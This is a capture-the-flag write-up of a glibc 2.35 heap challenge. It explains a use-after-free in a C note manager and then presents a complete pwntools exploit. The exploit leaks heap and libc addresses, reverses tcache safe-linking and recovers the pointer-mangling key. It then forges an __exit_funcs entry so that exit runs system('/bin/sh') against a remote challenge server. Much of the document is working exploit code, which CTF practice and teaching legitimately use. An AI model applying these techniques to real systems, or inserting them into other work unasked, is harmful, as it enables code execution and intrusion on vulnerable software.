# The challenge  
We were given C source code along with a compiled version and a copy of
ubuntu's glibc-2.35 (libc6_2.35-0ubuntu3_amd64)

This is your normal "CRUD" style (Create, Read, Update, Delete) heap challenge
(this time without the "update" part):  
```c  
#define MAX_CHUNK_SIZE 100  
#define CHUNKS_LIST_SIZE 32

enum Action {  
   ACTION_ADD = 1,  
   ACTION_DELETE,  
   ACTION_VIEW,  
   ACTION_EXIT,  
};

typedef struct chunk_t {  
   int64_t size;  
   int64_t used;  
   void *ptr;  
} chunk_t;

chunk_t *chunks[CHUNKS_LIST_SIZE];  
size_t chunk_idx = 0;

void add_chunk(void)  
{  
   if (chunk_idx >= CHUNKS_LIST_SIZE) {  
       puts("[-] Chunk limit exceeded!");  
       return;  
   }

   printf("[?] Enter chunk size: ");  
   size_t chunk_size = read_integer();

   if (chunk_size > MAX_CHUNK_SIZE) {  
       puts("[-] Chunk is too large!");  
       return;  
   }

   chunk_t *new_chunk = (chunk_t *)malloc(sizeof(chunk_t));

   if (new_chunk == NULL) {  
       puts("[-] Failed to create new chunk!");  
       return;  
   }

   void *ptr = (void *)malloc(chunk_size);

   if (ptr == NULL) {  
       puts("[-] Failed to create chunk for data!");  
       return;  
   }

   printf("[?] Enter chunk data: ");  
   ssize_t nbytes = read_into_buffer(ptr, chunk_size);

   new_chunk->size = chunk_size;  
   new_chunk->used = true;  
   new_chunk->ptr = ptr;

   chunks[chunk_idx] = new_chunk;  
   chunk_idx += 1;  
}

void delete_chunk(void)  
{  
   printf("[?] Enter chunk id: ");  
   size_t chunk_id = read_integer();

   if (chunk_id >= chunk_idx) {  
       puts("[-] Invalid chunk index!");  
       return;  
   }

   chunk_t *chunk = chunks[chunk_id];

   if (chunk == NULL) {  
       puts("[-] No such chunk!");  
       return;  
   }

   if (!chunk->used || chunk->ptr == NULL) {  
       puts("[-] Chunk is not used!");  
       return;  
   }

   free(chunk->ptr);  
   chunk->ptr = NULL;  
   chunk->used = false;  
   free(chunks[chunk_id]);  
}

void view_chunk(void)  
{  
   printf("[?] Enter chunk id: ");  
   size_t chunk_id = read_integer();

   if (chunk_id >= CHUNKS_LIST_SIZE) {  
       puts("[-] Invalid chunk index!");  
       return;  
   }

   if (chunks[chunk_id] == NULL) {  
       puts("[-] No such chunk!");  
       return;  
   }

   if (!chunks[chunk_id]->used || chunks[chunk_id]->ptr == NULL) {  
       puts("[-] Chunk is not used!");  
       return;  
   }

   write_from_buffer(chunks[chunk_id]->ptr, chunks[chunk_id]->size);  
}  
```

# The vulnerability  
Let's take a look at the `delete_chunk` function again:  
```c  
void delete_chunk(void)  
{  
   printf("[?] Enter chunk id: ");  
   size_t chunk_id = read_integer();

   if (chunk_id >= chunk_idx) {  
       puts("[-] Invalid chunk index!");  
       return;  
   }

   chunk_t *chunk = chunks[chunk_id];

   if (chunk == NULL) {  
       puts("[-] No such chunk!");  
       return;  
   }

   if (!chunk->used || chunk->ptr == NULL) {  
       puts("[-] Chunk is not used!");  
       return;  
   }

   free(chunk->ptr);  
   chunk->ptr = NULL;  
   chunk->used = false;  
   free(chunks[chunk_id]);  
}  
```  
Looks quite good actually, the deleted chunk is marked as unused so that we
cannot use it anymore and even the chunk's pointer is set to `NULL` so that we
wouldn't have a dangling pointer to work with if the checks were faulty...

So what's the problem here? Let's look closely at the last line. The `chunk_t`
with all the metadata about the entry is freed as well. However, it is still
accessible through the old index so this is a use after free bug!

Only the inner pointer is protected from a use after free, but not the
`chunk_t` itself. This is a friendly reminder, that you need to be very
careful when programming in C.  
To fix this vulnerability, chunks[chunk_id] should have been set to `NULL`
after the `free`.  
# A sidenote about Glibc >= 2.34  
Before we exploit this vulnerability, let's look at the changes from recent
glibc versions. It became a bit harder to exploit this stuff:

In version 2.34, `__malloc_hook` `__free_hook` and `__realloc_hook` were
[removed](https://developers.redhat.com/articles/2021/08/25/securing-malloc-
glibc-why-malloc-hooks-had-go). These hooks were easy targets for heap
exploitation, because writing the address of `system` to `__free_hook` and
calling `free` on the string `"/bin/sh"` gave you a shell. All you needed for
that was a write-what-where (and some address leaks to defeat ASLR). From a
hacker's perspective this is very annoying, but it's a good decision to
strengthen glibc's security. Now you have to find some other way to get code
execution (we will use the `__exit_funcs` structure later on, this stores the
functions to be executed before the program ends, set by `atexit(3)`)

Furthermore, new glibc versions don't store function pointers directly
anymore, but encrypted with a secret key created on startup (similar to stack
canaries). We will later on see what this means for our exploit.

# Exploitation  
## Talking with the binary  
To make our life easier, let's wrap each action from the binary into a python
function as the basic building blocks of our exploit:  
```python  
chunk_idx = 0

def add(content, l=None):  
   global chunk_idx  
   assert chunk_idx < 32  
   if not l:  
       l = len(content)  
   io.sendlineafter(b'> ', b'1')  
   io.sendlineafter(b'chunk size: ', str(l).encode())  
   io.sendafter(b'chunk data: ', content)  
   chunk_idx += 1

def delete(idx):  
   io.sendlineafter(b'> ', b'2')  
   io.sendlineafter(b"chunk id: ", str(idx).encode())

def view(idx):  
   io.sendlineafter(b'> ', b'3')  
   io.sendlineafter(b'chunk id: ', str(idx).encode())  
   response = io.recvuntil(b'1. Add')[:-6]  
   assert response[:3] != 'b[-]', response  
   return response  
```

## Basic exploit primitives  
### Read bytes from an arbitrary address  
So what can we do with this vulnerability? Remember, a deleted `chunk_t` is
`freed`, which means that this address can be returned for another allocation.
If we manage to write arbitrary content at this location, we fill the
`chunk_t` fields how we want.

Combine this with the `view` action, we can read from anywhere we want (just
overwrite the `length` and `ptr` fields and set `used` to 1).  
So, how can we do this? If we delete a chunk, the corresponding allocations
are put into the `tcache` (because of their size). If the content length was
24 (the same as `sizeof(chunk_t)`), then the tcache would look like this:  
```  
+----------+    +----------+  
|          |    |          |  
| chunk_t  | -> | contents |  
|          |    |          |  
+----------+    +----------+  
```

If we allocate the next chunk, the first `malloc` request will be for a
`chunk_t`, which will return the freed `chunk_t` address. While we can
overwrite the old index this way, we don't have control over the pointer. In
fact, the freed index will look exactly like our freshly allocated index so we
don't get anything out of it at all. What we want to do instead is to have the
`chunk_t` heap chunk returned for our string allocation... But to do so, we
need another entry in the tcache in front.

What we can do is to free two different chunks. Then the tcache will look like
this:  
```  
+----------+    +----------+    +----------+    +----------+  
|          |    |          |    |          |    |          |  
|chunk i+1 | -> | contents | -> | chunk i  | -> | contents |  
|          |    |          |    |          |    |          |  
+----------+    +----------+    +----------+    +----------+  
```  
If we would allocate a chunk of size 24 now, then the first two entries are
removed to serve the allocations. However the `chunk_t` the same problem
persists, as the `chunk_t` structure is written to `chunk i+1`, but we wanted
our string to go into one of these chunks. Therefore, before we can allocate a
chunk of size 24, we have to allocate a chunk of a bigger size, because then
it cannot be served by these chunks as they are too small, thus removing only
one element from this linked list.

After an `add("a"*64)`, the tcache will look like this:  
```  
+----------+    +----------+    +----------+  
|          |    |          |    |          |  
| contents | -> | chunk i  | -> | contents |  
|          |    |          |    |          |  
+----------+    +----------+    +----------+  
```  
Therefore, the next `add("b"*24)` would fill `chunk i` with 24 `0x62` (the
ascii value of `b`). If we would view `chunk i` now, the binary will crash
because we have overwritten the pointer with an invalid address.

Instead of 24 `b`s we want a reasonable payload, so let's use this one:
`p64(length) + p64(1) + p64(ptr)`. This is just the structure defined above,
but this time we can control the length and the pointer value. If we view this
chunk now, we read `length` bytes from `ptr`. This is our arbitrary read.

**Note:** While creating this writeup, I noticed that this can be done easier.
If the second chunk we freed had a different size, it would be put into
another tcache. So that we get:  
```  
+----------+    +----------+    +----------+  
|          |    |          |    |          |  
|chunk i+1 | -> | chunk i  | -> | contents |  
|          |    |          |    |          |  
+----------+    +----------+    +----------+  
```

Now we can allocate a string of size 24 and it will be put into `chunk i`
above...

### Possibly arbitrary write? No, but we can free anything!  
Unfortunately, we cannot get an arbitrary write the same way. While we could
write any pointer and free the chunk (keep in mind that the pointer will be
freed as well!), this will not work for arbitrary addresses, because `free`
expects the freed pointer to have a valid heap chunk header in front of it (it
needs to determine where to put this chunk after all!). However, most
addresses will not look like a valid heap chunk and will result in a crash...

But we can use this to free an arbitrary (valid looking) heap chunk. So we get
a double free out of it if we know some heap address.

## Leaks  
Ok, so now we can read from anywhere we want, but this executable is position
independent, which means that all base addresses are random with ASLR turned
on (not only the heap and libraries). Before we can read anything we need to
know some addresses!

### Heap leak  
Fortunately, the `read_to_buffer` function contains another bug: It will only
call the `read()` system call one time and not until the buffer is full.
`read` will return any data that is available, without waiting until the
complete buffer can be filled. This means that we can send only a single byte
for our let's say 24 bytes buffer. So that 23 of 24 bytes will not be
overwritten when allocating. However, because the buffer size is 24, view will
still return 24 bytes, therefore we can read most of what was there before we
allocated the chunk.  
As a freed heap chunk in the tcache has the fwd pointer as the first 8 bytes
of the user data, we can recover 7 out of 8 bytes of the next chunks address
in the tcache. As we will only need this up to the page boundary, we don't
need the least significant byte anyway.

But wait, glibc has some pointer obfuscation in the tcache by now as well. It
would be too easy without, right?

How does it work? The magic happens in the `PROTECT_PTR` macro in
[malloc.c:340](https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L340):  
```c  
/* Safe-Linking:  
  Use randomness from ASLR (mmap_base) to protect single-linked lists  
  of Fast-Bins and TCache.  That is, mask the "next" pointers of the  
  lists' chunks, and also perform allocation alignment checks on them.  
  This mechanism reduces the risk of pointer hijacking, as was done with  
  Safe-Unlinking in the double-linked lists of Small-Bins.  
  It assumes a minimum page size of 4096 bytes (12 bits).  Systems with  
  larger pages provide less entropy, although the pointer mangling  
  still works.  */  
#define PROTECT_PTR(pos, ptr) \  
 ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))  
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)  
```

How do we get the original pointer out of it? Well, if both arguments (the
position where the pointer is written and the pointer itself) are on the same
page, then we can fully reverse this obfuscation. We know that the first 12
bits are `0`, because of the right shift by 12. This means that the first 12
bits are not modified. Now with these 12 bits we can decrypt the next 12 bits
(because `x^(x^y) = y`). Now repeat this until you have decrypted the entire
pointer:  
```python  
def deobfuscate(val):  
   mask = 0xfff << 52  
   while mask:  
       v = val & mask  
       val ^= (v >> 12)  
       mask >>= 12  
   return val  
```  
Now, we just need to free two chunks and allocate one with a single `\x00`
byte, so that we can read the fwd pointer of the tcache. We need to free two
chunks so that the fwd pointer is not `NULL` (therefore there are still
elements in the tcache after it).

Then we can use the deobfuscate function to decrypt the pointer (the lowest
byte is broken because it was overwritten with our null byte). Now, the base
address of the heap is anything but the 12 lowest bits. (e.g. `(leak >> 12) <<
12`)

### Libc leak  
How do we leak a libc address? The normal way would be to read this from a
chunk in the unsorted bin... However, we can only allocate up to 100 bytes,
which is too small to be put into the unsorted bin and will just go to the
tcache instead.

However, we can just pretend that we've got a chunk large enough to be put
into the unsorted bin... What if we write `p64(0x421)` somewhere on the heap?
To glibc this looks like a heap chunk header of size `0x420` with the previous
chunk in use bit set, if we free it, it will be put into the unsorted bin.

However, we still have to make it look like it's a valid chunk, before `free`
accepts it. What does `free` check?  
- Is the chunk correctly aligned? All chunks returned by `malloc` are multiples of `0x10`  
- Is the next chunk (at ptr + size - 8) valid? Is the `prev_inuse_bit` set? If it isn't try to merge these chunks  
- Is the previous chunk size (at ptr + size - 16) the same as the one in the header? If not, abort  
  
Therefore, we need to add another valid looking chunk after the chunk we want
to free.  
By experimenting inside GDB, we found out that for a chunk of size `0x420`, we
need 6 x 100 byte chunks to fill the gap in between. The end of the chunk is
somewhere inside the seventh chunk, where we want to write
`p64(0x420)+p64(0x21)` so that it looks like a valid chunk of size `0x20` with
previous chunk size `0x420`. This also sets the `prev_inuse_bit` so that
`free` will not try to merge these chunks, leaving this bit unset would
trigger more checks, which we do not want. This is how the heap will look
like:

```  
0x000056454cbe62f8: 0x0000000000000021  
0x000056454cbe6300: 0x6161616161616161 <- Pointer to the chunk we allocated  
0x000056454cbe6308: 0x0000000000000421 <- Fake chunk header  
0x000056454cbe6310: 0x0000000000000000  
...  
0x000056454cbe6720: 0x0000000000000420 <- Previous chunk size (checked by
free)  
0x000056454cbe6728: 0x0000000000000021 <- Next fake chunk (exactly 0x420 bytes
after the first fake header)  
0x000056454cbe6730: 0x0000000000000000  
0x000056454cbe6738: 0x0000000000000000  
0x000056454cbe6740: 0x0000000000000000  
0x000056454cbe6748: 0x00000000000208c1 <- Header of the top chunk  
```

Now, when we free the address where we wrote `0x420` + 8, our faked heap chunk
will be put into the unsorted bin and we can read the pointer to glibc's
`main_arena+96` from the same address we just freed.

Luckily, we can use this pointer as is, there's no pointer obfuscation here
(yet? :P)

## Write anywhere  
If we want code execution, we will need to replace a function pointer
somewhere... So how do we do this?

Let's recall what we did to obtain a libc leak. We created a fake chunk and
convinced `free` to accept it. What if we also freed the chunk where this fake
chunk header is written? Then we could access the same chunk from two
different places, which is bad, because then we can just overwrite the fwd
pointer in the tcache to return us an arbitrary address...

However, there is a catch: The pointer returned by `malloc` must also be
aligned to `0x10` bytes or else we fail a check in `malloc` and the program
aborts. So we may have to write some bytes in front of our target as well.

## Where do we want to write?  
As said before, glibc 2.34 removed the easy `__free_hook` exploit primitive...
Unfortunately, we have to deal with `__exit_funcs` now.

During the CTF, I used [this blog
post](https://binholic.blogspot.com/2017/05/notes-on-abusing-exit-
handlers.html) to figure out how it works. But it is also advisable to look at
the source code
[here](https://elixir.bootlin.com/glibc/glibc-2.35/source/stdlib/exit.h) and
[here](https://elixir.bootlin.com/glibc/glibc-2.35/source/stdlib/exit.c).

I will summarize the key points here again:  
- There is an unpublished symbol `__exit_funcs` that holds a linked list of functions to be executed before the program exits.  
- This address can be found by looking at the `exit` function, as it just calls `_run_exit_handlers` with the pointer that is stored in `__exit_funcs`.  
- Each function pointer is encrypted with xor and rotated right by `0x11` bits.  
-  By default there is a function `_dl_fini` in there. We can figure out the address with GDB (set a breakpoint to the exit handler and step until the pointer is decrypted)  
-  This function is in the linker, which is loaded directly after libc in the address space, so we can use the libc leak to compute the function's address  
-  Once we have leaked the encrypted pointer, we can get the encryption key by `rotateleft(leak) ^ _dl_fini_address`  
-  Now we can encrypt arbitrary addresses :)

How do we put this all together? We want to replace the pointer stored in
`__exit_funcs` (whose address we know via the libc leak). We will put the
address of a fake `exit_function_list` we allocated on the heap in there.

How does this structure look like?  
```c  
enum  
{  
 ef_free,       /* `ef_free' MUST be zero!  */  
 ef_us,  
 ef_on,  
 ef_at,  
 ef_cxa  
};

struct exit_function  
 {  
   /* `flavour' should be of type of the `enum' above but since we need  
      this element in an atomic operation we have to use `long int'.  */  
   long int flavor;  
   union  
     {  
	void (*at) (void);  
	struct  
	  {  
	    void (*fn) (int status, void *arg);  
	    void *arg;  
	  } on;  
	struct  
	  {  
	    void (*fn) (void *arg, int status);  
	    void *arg;  
	    void *dso_handle;  
	  } cxa;  
     } func;  
 };  
struct exit_function_list  
 {  
   struct exit_function_list *next;  
   size_t idx;  
   struct exit_function fns[32];  
 };  
```

**Note:** `idx` denotes the number of entries.

So we want a `exit_function_list` with next set to `NULL`, `idx` to 1 and an
`exit_function` in `fns[0]`. What type of exit function do we want? There are
different "flavors" to choose from. In our case type `cxa` looks nice, because
we can specify a pointer as the first argument of the function as well.

If we put a pointer to `"/bin/sh"` into `arg` (just allocate it on the heap,
we can calculate the offset) and the address of `system` into `fn`, a call to
`exit()` will invoke `system("/bin/sh")` and we're done. What a ride!  
# Complete exploit  
```python  
#!/usr/bin/env python3  
from pwn import *

# Set up pwntools for the correct architecture  
context.update(arch='amd64', terminal=['alacritty', '-e', 'sh', '-c'])

exe_file = './main'

host = '51.250.22.68'  
port = 17001

binary = ELF(exe_file)  
libc = ELF('./libc.so.6')

def start(argv=[]):  
   '''Start the exploit against the target.'''  
   if args.GDB:  
       return gdb.debug([exe_file] + argv, gdbscript=gdbscript)  
   elif args.REMOTE:  
       return remote(host, port)  
   else:  
       return process([exe_file] + argv)

# Specify your GDB script here for debugging  
# GDB will be launched if the exploit is run via e.g.  
# ./exploit.py GDB  
gdbscript = '''  
'''

# ===========================================================  
#                     EXPLOIT GOES HERE  
# ===========================================================

io = start()  
chunk_idx = 0

def add(content, l=None):  
   global chunk_idx  
   assert chunk_idx < 32  
   if not l:  
       l = len(content)  
   io.sendlineafter(b'> ', b'1')  
   io.sendlineafter(b'chunk size: ', str(l).encode())  
   io.sendafter(b'chunk data: ', content)  
   chunk_idx += 1

def delete(idx):  
   io.sendlineafter(b'> ', b'2')  
   io.sendlineafter(b"chunk id: ", str(idx).encode())

def view(idx):  
   io.sendlineafter(b'> ', b'3')  
   io.sendlineafter(b'chunk id: ', str(idx).encode())  
   response = io.recvuntil(b'1. Add')[:-6]  
   assert response[:3] != 'b[-]', response  
   return response

# Read primitive  
# When we free a chunk, chunks[idx] still points to the heap  
# When that chunk is allocated again, we can fill the contents  
# with anything we want  
# Idea:  
# 1. Free 2 chunks with content size 24 (= sizeof(chunk_t)) to put them in the
tcache  
#    Both their content and their datastructure is freed, so the tcache looks
like this:  
# +----------+    +----------+    +----------+    +----------+  
# |          |    |          |    |          |    |          |  
# |chunk i+1 | -> | contents | -> | chunk i  | -> | contents |  
# |          |    |          |    |          |    |          |  
# +----------+    +----------+    +----------+    +----------+  
# When we would allocate, two chunks are removed and in the second one, we can
write anything we want  
# If we could discard the first one, we can write anything we want into chunk
i (which is still accessible!)  
# If we write a valid chunk layout (with used=1) into chunk i, we can read
from the pointer in that structure (which we also control)  
# 2. To discard a chunk, we allocate a string that is bigger than 24, so it
cannot be served from the tcache  
#    Therefore, only chunk i+1 is removed to serve the
malloc(sizeof(chunk_t)).  
# 3. Allocate a chunk of size 24 (= sizeof(chunk_t)). The chunk_t allocation
will point to contents from above, while our allocated string  
#    will be put into chunk i. The layout of chunk_t is length + used + ptr.
Therefore we write p64(length to read) + p64(1) + p64(ptr to read)  
# 4. If we view chunk i, it will read the length and ptr to read from the just
allocated fake chunk_t  
def read(ptr, l):  
   idx = chunk_idx  
   # 1. free 2 chunks of size 24  
   add(b'A' * 24)  
   add(b'B' * 24)  
   delete(idx)  
   delete(idx + 1)  
   # 2. Discard a chunk (allocate with size > 24)  
   add(b'C' * 64)  
   # 3. Craft a fake chunk_t  
   add(p64(l) + p64(1) + p64(ptr))  
   # Use the dangling pointer from chunk idx, to read from wherever we like  
   return view(idx)

# Can we also use something similar to write anywhere we like? Unfortunately
not.  
# We can only write to a chunk when we allocate it and not while it's in the
tcache.  
# Therefore we cannot overwrite a chunk's fwd pointer (it would work if we had
a double free).  
# However, we can use the previous idea to free an arbitrary pointer, giving
us more control over the heap.  
# To do so, instead of viewing the faked chunk, we simply delete it again, so
that the pointer from  
# the fake chunk_t is freed as well  
def free(ptr):  
   idx = chunk_idx  
   # Same idea as before  
   # 1. free 2 chunks of size 24  
   add(b'A' * 24)  
   add(b'B' * 24)  
   delete(idx)  
   delete(idx + 1)  
   # 2. Discard a chunk  
   add(b'C' * 64)  
   # 3. Craft a fake chunk_t  
   add(p64(8) + p64(1) + p64(ptr))  
   # When we delete the fake chunk_t, the given ptr is also freed  
   delete(idx)

# Defeat glibc's heap pointer obfuscation  
# mangled = ptr ^ (address >> 12), where address is the address the pointer is
stored at  
# If the pointer is stored in the same page, we can fully recover the leaked
pointer value,  
# as we know the first 12 bits  
def deobfuscate(val):  
   mask = 0xfff << 52  
   while mask:  
       v = val & mask  
       val ^= (v >> 12)  
       mask >>= 12  
   return val

# "/bin/sh" string we later use for system() call  
add(b"/bin/sh")

# Leak a heap address  
# When we free() a chunk it gets put into the tcache  
add(b'K' * 24)  
add(b'L' * 24)  
delete(1)  
delete(2)  
add(b'\x00', l=24)  
heap = (deobfuscate(u64(view(3)[:8])) >> 12) << 12  
log.info(f'Heap @{hex(heap)}')

# Libc leak  
# To leak a libc address, we need to put a chunk into the unsorted binary  
# Unfortunately, we can only allocate up to 100 bytes, which is too short  
# and will be put into the tcache instead  
# Therefore, we create a fake chunk instead, which we will free manually.  
# Glibc checks whether the chunk looks "sane", e.g. if the next chunk (ptr +
chunk_size)  
# has the prev_in_use bit set (lowest bit) and whether the previous size
matches  
# (at ptr + chunk_size - 8)  
# We allocate our fake chunk of size 0x420 (1056 bytes, just enough to get
into the unsorted bin)  
add(b'7' * 8 + p64(0x420 + 1))  
# Now, we need to get to the end of our fake chunk to make glibc happy  
# 6 Chunks in between are enough (just tried in GDB, not used math for this
one lol)  
for i in range(6):  
   add(bytes([i]) * 100)  
# In this allocation is the end of our faked chunk.  
# We need to write the previous chunk's size (0x420) followed by a valid chunk
header (e.g. 0x21)  
# It is important that the prev_in_use_bit is set (e.g. 0x20 would not work!)  
# As I am too lazy to calculate the correct offset, we just do heap spraying
:P  
add((p64(0x420) + p64(0x21)) * 6)  
# If we free this chunk, a pointer to glibc's main arena can be read from the
chunk's fwd and bwd pointer  
free(heap + 0x310)

# Careful! Heap allocations can be served from the chunk in the unsorted bin,
shrinking it from the beginning of said chunk.  
# Unfortunately, our read primitive allocates, so that after the allocations
the fwd and bwd pointer are at offset 0x3a0  
# instead of 0x310 (I also refused to use math for this one and did it in GDB)  
libc.address = u64(read(heap + 0x3a0, 8)) - 0x219ce0  
__exit_funcs = libc.address + 0x219838  
log.info(f'libc         @{hex(libc.address)}')  
log.info(f'__exit_funcs @{hex(__exit_funcs)}')

# We need to pop a shell after all. So what do we do next?  
# Normally I'd just overwrite `__free_hook` with `system`, but glibc 2.34
removed the malloc hooks...  
# Now, we have to use the __exit_funcs array which is way more complicated >:(  
# I used this blogpost to figure it out:
https://binholic.blogspot.com/2017/05/notes-on-abusing-exit-handlers.html  
# To summarize it, we have to create exit_funcs_list on the heap and put the
`system` function there with "/bin/sh\x00"  
# as an argument (using the ex_cxa function type)  
# It is advisable to read the source code to understand how and why:  
# Here is the type definition:
https://elixir.bootlin.com/glibc/glibc-2.35/source/stdlib/exit.h  
# And here how the handlers are executed:
https://elixir.bootlin.com/glibc/glibc-2.35/source/stdlib/exit.c

# But most importantly, glibc uses pointer mangling to "encrypt" stored
function pointers  
# The reasoning is that it makes it harder to write exploits (it really does)  
# How does it work?  
#   pointer encryption: rotateleft(ptr ^ key, 0x11)  
#   pointer decryption: rotateright(ptr, 0x11) ^ key  
# where key is a random value set at program start (similar to the stack
canary)  
# To find this key, we will need to obtain a known encrypted pointer. Luckily
there is one in the __exit_funcs by default.  
# See the above blogpost for details

# This is where the original __exit_funcs first function is stored (found the
offset using gdb):  
orig_onexit_addr = libc.address + 0x21af18  
# And this is the address of the function (_dl_fini) it calls  
orig_handler = libc.address + 0x230040

# The shifts are copied from the above blogpost  
# Rotate left: 0b1001 --> 0b0011  
rol = lambda val, r_bits, max_bits: \  
   (val << r_bits%max_bits) & (2**max_bits-1) | \  
   ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

# Rotate right: 0b1001 --> 0b1100  
ror = lambda val, r_bits, max_bits: \  
   ((val & (2**max_bits-1)) >> r_bits%max_bits) | \  
   (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))

# encrypt a function pointer  
def encrypt(v, key):  
   return p64(rol(v ^ key, 0x11, 64))

# obtain the key  
key = ror(u64(read(orig_onexit_addr, 8)), 0x11, 64) ^ orig_handler

# Sanity check that the implementation is correct (check in GDB)  
log.info(f'ptr encryption key: {hex(key)}')  
log.info(f'sanity check: {hex(u64(encrypt(orig_handler, key)))}')

# Next, we need to allocate our exit_function_list, we're using the cxa type
because it is called as func(void *arg, int status)  
# This is nice to obtain system(void *arg) where arg is a pointer to "/bin/sh"  
# We already allocated the '/bin/sh' at offset 0x2c0  
#############  next | count  | type (cxa) | addr                             | arg               | not used  
onexit_fun = p64(0) + p64(1) + p64(4)     + encrypt(libc.sym['system'], key) +
p64(heap + 0x2c0) + p64(0)  
add(onexit_fun)

# So, how do we write this to the __exit_funcs pointer?  
# We can use the free()-primitive to get a double free  
# Then we can allocate one (setting the fwd pointer)  
# Note that glibc checks whether tcache chunks are properly aligned (multiple
of 0x10)  
# As it is at an odd address, we have to allocate 8 bytes earlier and pad our
string  
idx = chunk_idx  
add(b'0' * 24 + p64(0x21) + b'Z'*16)  
delete(idx)  
free(heap + 0x4d0)

# Now, when we allocate the chunk_t again (chunk idx), we can overwrite the
fwd pointer,  
# which will be served in the next allocation  
# Important: We have to obfuscate the pointer!  
add(b'0' * 24 + p64(0x21) + p64((__exit_funcs - 8) ^ (heap >> 12)) + b'Y'*16)  
# Now, the next alloc returns the address __exit_funcs - 8, which we will
overwrite  
# with our exit_function_list we allocated earlier  
add(b'\x00' * 8 + p64(heap + 0x450))

# Now we can exit and let everything unfold  
io.sendlineafter(b'> ', b'4')  
io.interactive()  
```